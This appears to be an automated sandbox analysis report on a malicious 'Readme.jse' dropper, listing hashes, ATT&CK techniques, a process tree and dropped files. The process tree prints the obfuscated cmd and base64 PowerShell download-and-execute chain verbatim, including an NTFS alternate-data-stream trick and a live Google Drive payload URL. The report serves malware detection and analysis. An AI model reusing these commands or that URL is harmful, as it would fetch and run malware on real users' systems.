d215bed00e78a30a169a76965364ba10205d24e1803a5d8cabdb22616679ef61

General

Target

Readme.jse
Size

1KB
MD5

afbbf88c39646d17dcc0ce6383204b3b
SHA1

cd3a92e79faa4e1e9011ac21fa6beeb285657993
SHA256

d215bed00e78a30a169a76965364ba10205d24e1803a5d8cabdb22616679ef61
SHA512

e500ad5231b81b5ae5a92db03db8fe87c67299b7865b3f36293c98bb46614d17f3e11e712023d6fa06812c4717174f96db17ff36c2c8b2160ce71fe2b8909574

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?id=1iktVtJAbuAyKtOK0xSpQJnmm88EicL4d&export=download

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	848	powershell.exe
6	848	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\LocalH6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg	cmd.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
848	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	848	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1604 wrote to memory of 1260	1604	WScript.exe	27
PID 1604 wrote to memory of 1260	1604	WScript.exe	27
PID 1604 wrote to memory of 1260	1604	WScript.exe	27
PID 1260 wrote to memory of 2040	1260	cmd.exe	28
PID 1260 wrote to memory of 2040	1260	cmd.exe	28
PID 1260 wrote to memory of 2040	1260	cmd.exe	28
PID 1260 wrote to memory of 1096	1260	cmd.exe	30
PID 1260 wrote to memory of 1096	1260	cmd.exe	30
PID 1260 wrote to memory of 1096	1260	cmd.exe	30
PID 1096 wrote to memory of 848	1096	cmd.exe	31
PID 1096 wrote to memory of 848	1096	cmd.exe	31
PID 1096 wrote to memory of 848	1096	cmd.exe	31
PID 848 wrote to memory of 1716	848	powershell.exe	32
PID 848 wrote to memory of 1716	848	powershell.exe	32
PID 848 wrote to memory of 1716	848	powershell.exe	32
PID 1716 wrote to memory of 364	1716	csc.exe	33
PID 1716 wrote to memory of 364	1716	csc.exe	33
PID 1716 wrote to memory of 364	1716	csc.exe	33
PID 848 wrote to memory of 632	848	powershell.exe	34
PID 848 wrote to memory of 632	848	powershell.exe	34
PID 848 wrote to memory of 632	848	powershell.exe	34
PID 848 wrote to memory of 1584	848	powershell.exe	35
PID 848 wrote to memory of 1584	848	powershell.exe	35
PID 848 wrote to memory of 1584	848	powershell.exe	35

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Readme.jse"
1⤵
- Suspicious use of WriteProcessMemory
PID:1604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" CMD.eXE /c cMd.eXe /c eCHo poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA= > %LOCALAPPDATA%H6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg & CMd - < %LOCALAPPDATA%H6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg
  2⤵
  - NTFS ADS
  - Suspicious use of WriteProcessMemory
  PID:1260
- - C:\Windows\system32\cmd.exe
    cMd.eXe /c eCHo poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA=
    3⤵
    PID:2040
- - C:\Windows\system32\cmd.exe
    CMd -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1096
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:848
    - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\okqcaguf.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1716
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES21D5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC21D4.tmp"
        6⤵
        
        PID:364
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cOpy /b %LOCALAPPDATA%\23sBebmrIp3ktbW1Q4A5l50lSj56P0W0n2E375juzHRc6qMmq1MCRdJdaVJXSbDL.jpg + %LOCALAPPDATA%\DRy8q3cz8Qy7C9RCUj6Fgfl8cl50T0J1wXa763SSG9JOd7c3Hw6T56Tv4p3zg80m.avi %LOCALAPPDATA%\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        5⤵
        
        PID:632
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /k %LOCALAPPDATA%\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        5⤵
        
        PID:1584

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES21D5.tmp

Filesize
1KB

MD5
82b27d531eb009e35d73e25606dce32d

SHA1
7f1ad2ef2eb8578d4f919bfe98132cbecd8a3f3d

SHA256
87eb7e42874c986029d3f4df4060571aa29af660a87895a24727ee9ab0a1afdf

SHA512
30c2f7fc81820f9c45e9e74d417f9b0e21430e0ad96df00f5874b6e94d63e51013cd1a3ae6b7b647959ba32baf48c938092a3047194ebd4fa1e888c1fac2b6c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\okqcaguf.dll

Filesize
3KB

MD5
5c9c6e18dd0112ba6bb6f30330d15efc

SHA1
190f8fe9fae98a6c8094c727170a3eb81b33cb0d

SHA256
8417e14329c035c6bc2a321e464309adb0c1ba17d72f78606a5df7a688397f14

SHA512
81524f33705134d4e2713781763b4cc51dffa812648f9ccc7b245c092cc0533e492d5dbf21679b7d9d173f429e2554350c1a52cd25fcaa70cba85c7375ae7037

Download Submit
C:\Users\Admin\AppData\Local\Temp\okqcaguf.pdb

Filesize
7KB

MD5
117095a2caf13b529eae726fc3637966

SHA1
9fc8c5d85272f594031a2279bb65c009f93484dc

SHA256
90c4b73bfef08ed52282ee4174d76ce9dead91fd41d6518de935907428a29241

SHA512
b3f4aae35ae1cce3a5e2ee4466294b000c2e7b43dabcbf348e26df7ceba71540277744a82c3b7cd6744c80c8a87ffd52ad2eb7d10f42547e5c8585e5c9c360e9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC21D4.tmp

Filesize
652B

MD5
9eec32361fa2521801cbecf9c09424ff

SHA1
2e98fca956005fb614cfddd857ed84632c5dfda0

SHA256
17dd3bc1e61b159a0bd4793e1e1d0754ffabad490e6b15db1e279d5483bf4309

SHA512
a044ddfd720b3ac006dd660145508f545ba3e1940ea7fec1cd730a9a6b288c1fdab61c3f749e31252af5b9c8ccd4d875b5feec7fe1b9a81cc533d716d4d64df0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\okqcaguf.0.cs

Filesize
341B

MD5
1580ef4b9aa250d3a7839cb96f827b83

SHA1
5d1c458e697efb38e1ec19191ae753d83459df9a

SHA256
11f5a76d49f0609436736cbbd99fb416d507e78a3376a162bb8912f62ce3bab7

SHA512
8f63c8e1e68b66181f304015cc578ed4b058294f8c39c21d8638ebcd06b8946887d67af2dc96324fd1c2365d52ba65d417c82686c36ce0e0c0afcd688e840e2e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\okqcaguf.cmdline

Filesize
309B

MD5
d0ae3a06007dfb681966be873e221038

SHA1
fe8cf0a7b73a2e703eef7c162612fb0db7bbd96c

SHA256
925f11285a8a2ea4020850fb30734f7292d29ecae041ef6f5694037574effd3c

SHA512
7e1c0c96b3e25b33efbd67eba028480273065621c9a5fa33f32bd69403680f13473afd003e0ea775684df7cda6722495fe11bcc74b9d2d7379e06b7bf4d8a9c4

Download Submit
memory/848-61-0x000007FEF30F0000-0x000007FEF3C4D000-memory.dmp

Filesize
11.4MB

Download
memory/848-63-0x000000000285B000-0x000000000287A000-memory.dmp

Filesize
124KB

Download
memory/848-75-0x000000000285B000-0x000000000287A000-memory.dmp

Filesize
124KB

Download
memory/848-74-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/848-60-0x000007FEF3C50000-0x000007FEF4673000-memory.dmp

Filesize
10.1MB

Download
memory/848-62-0x0000000002854000-0x0000000002857000-memory.dmp

Filesize
12KB

Download
memory/1604-54-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp

Filesize
8KB

Download

Resubmissions

Analysis

Sharing